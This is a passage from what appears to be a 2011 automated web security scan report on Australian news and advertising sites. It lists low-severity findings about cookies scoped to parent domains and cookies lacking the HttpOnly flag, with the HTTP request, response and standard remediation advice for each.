/*!
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

8.82. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/libraries/pluck/abc.pluck-1.latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Feb 2011 00:41:45 GMT
ETag: "16545ae-6697-20d00440"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=6708
Expires: Wed, 07 Sep 2011 16:06:01 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 26263
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var ABC=ABC?ABC:{};ABC.Pluck=function(g){function b(h,j,i){if(ABC.Debug&&typeof(console)!=="undefined"&&typeof(console.log)!=="undefined"){console.log("Namespace="+h+", Function="+j+":");console.log(i
...[SNIP]...

8.83. http://www.wtp101.com/pull_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=rubicon HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://pixel.rubiconproject.com/tap.php?v=5328&nid=2025&put=f9bdca69-e609-4297-9145-48ea56a0756c&expires=730
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Fri, 06 Sep 2013 14:14:28 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


9. Cookie without HttpOnly flag set
There are 96 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



9.1. http://www.6pr.com.au/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.6pr.com.au
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: